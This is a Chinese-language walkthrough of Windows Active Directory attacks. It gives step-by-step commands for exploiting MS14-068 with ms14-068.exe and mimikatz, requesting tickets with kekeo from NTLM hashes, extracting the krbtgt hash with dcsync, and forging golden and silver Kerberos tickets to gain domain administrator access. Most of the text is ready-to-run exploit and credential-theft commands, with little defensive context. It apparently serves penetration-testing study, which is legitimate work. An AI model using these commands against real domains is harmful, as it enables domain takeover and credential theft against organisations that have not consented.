漏洞原理和影响版本#

• Kerberos 的 TGT（票据授予票据）请求中，微软未正确校验用户的 PAC（特权属性证书）数据。普通域用户可构造恶意 PAC，伪造自己是域管理员，从而让域控返回域管理员权限的 TGT 票据。
• 受影响系统：Windows Server 2003/2008/2008 R2（未安装 KB3011780 补丁）；

利用流程#

1. 在域内用户的主机（上述web）打开cmd，查询补丁情况，执行以下指令： systeminfo | findstr "3011780"

返回为空说明没有对应补丁，使用klist purge清除历史票据，并用klist检查票据缓存后进入下一步。

2. 利用ms14-068.exe工具执行以下指令： ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员的sid -d 域控制器的地址

3. 这里使用mimikatz工具导入票据，输入kerberos::ptc 生成的票据名称（这样写请注意mimikatz和票据要在同目录下）。

4. 在mimikatz中可以使用kerberos::list查看票据（kerberos::purge清除票据），发现导入了我们生成的票据。

5. 在新的cmd窗口输入dir \\域控主机名\C$发现成功展示域控主机的C盘根目录，此时已经拿到了域管理员权限。（注意是域控主机名，不是IP！！）

简单定位#

kekeo 是一款轻量级 Kerberos 协议专用工具，专注于域环境中 Kerberos 票据的操作与攻击，该工具提供了许多常用模块（其中tgt、tgs模块较为常用）。

利用域用户ntlm哈希生成票据与导入#

1. 在其工作目录打开cmd窗口，输入以下生成票据： ./kekeo "tgt::ask /user:域成员名 /domain:域名 /ntlm:mtlm哈希"

我用的域控主机的ntlm哈希值，这样可以生成一个域管理员权限的tgt票据（若只有普通域用户的ntlm哈希只能生成域用户权限的tgt凭证）。

2. 清除现有票据并导入刚才生成的票据: kerberos::ptt 票据名

3. 打开新的cmd窗口输入dir \\域控主机名\C$已经拿到了域管理员权限。

小补充#

关于域控主机名获取是信息收集模块的内容，这里简单说一下部分在域用户上执行的常用信息收集指令：

• net time /domain:获取主域（主机名）
• ipconfig /all:通过dns后缀判断是否有域
• nslookup 域名:获取域控制器IP
• netstat -ano:判断域内角色

krbtgt用户#

1. 主要功能 krbtgt 是域控上密钥分发中心（KDC）的专属账户，主要负责两个关键操作：

• 生成 TGT 票据：用户登录域时，KDC 会用krbtgt的密码哈希加密生成 TGT，这是域内后续申请所有服务票据的基础。
• 票据校验与加密：所有 Kerberos 票据的加密、解密和完整性校验，都依赖krbtgt的密钥（密码哈希）。

2. 账户特性

• 隐藏账户：默认不会显示在域用户列表中，只能通过域数据库（NTDS.dit）或dcsync命令查看。
• 权限极高：不属于任何用户组，但拥有域内 Kerberos 认证的最高控制权，其哈希是生成黄金票据的核心条件。

黄金票据生成（tgt）#

1. 使用mimikatz以下指令在有域管理员权限的窗口获取krbtgt用户的sid和ntlm哈希： lsadump::dcsync /domain:域名 /user:krbtgt

2. 在mimikatz工作目录执行以下指令： mimikatz.exe "kerberos::golden /admin:system /domain:域名 /sid:krbtgt用户sid /krbtgt: krbtgt用户ntlm哈希 /ticket: 生成的文件名(如1.kirbi)"

3. 使用mimikatz等工具按照以上流程导入票据和利用

白银票据生成（tgs）#

使用mimikatz，与tgt流程相似，在此不过多阐述，简单说一下伪造票据格式： kerberos::golden /domain:域名 /sid:客户端域用户sid /target:访问域计算机全名或IP地址 /rc4:域用户ntlm哈希 /service: 要伪造的服务（如cifs） /user:要伪造域用户名 /ptt